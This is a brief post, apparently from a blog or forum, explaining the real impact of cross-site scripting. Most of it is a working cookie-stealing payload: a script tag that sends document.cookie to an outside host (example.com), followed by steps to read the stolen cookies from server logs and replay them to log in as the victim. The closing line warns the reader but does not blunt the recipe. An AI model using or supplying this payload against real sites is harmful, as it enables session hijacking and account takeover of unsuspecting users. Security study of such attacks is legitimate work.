Actual XSS Impact

Popping up alert boxes as a PoC for XSS is cute and all, but sometimes you want to see the actual attack. The following javascript line will make a GET request to example.com/wut.gif and append the document.cookie to the request. You then log into that server, read your apache logs, and you have the cookies for that user. Replace your browser's cookies with the captured ones and, depending on the site, you could log in as them.

<script>a = new Image(); a.src = "http://example.com/wut.gif?" + document.cookie + "end"; </script>

This is an actual attackers line, dont be stupid.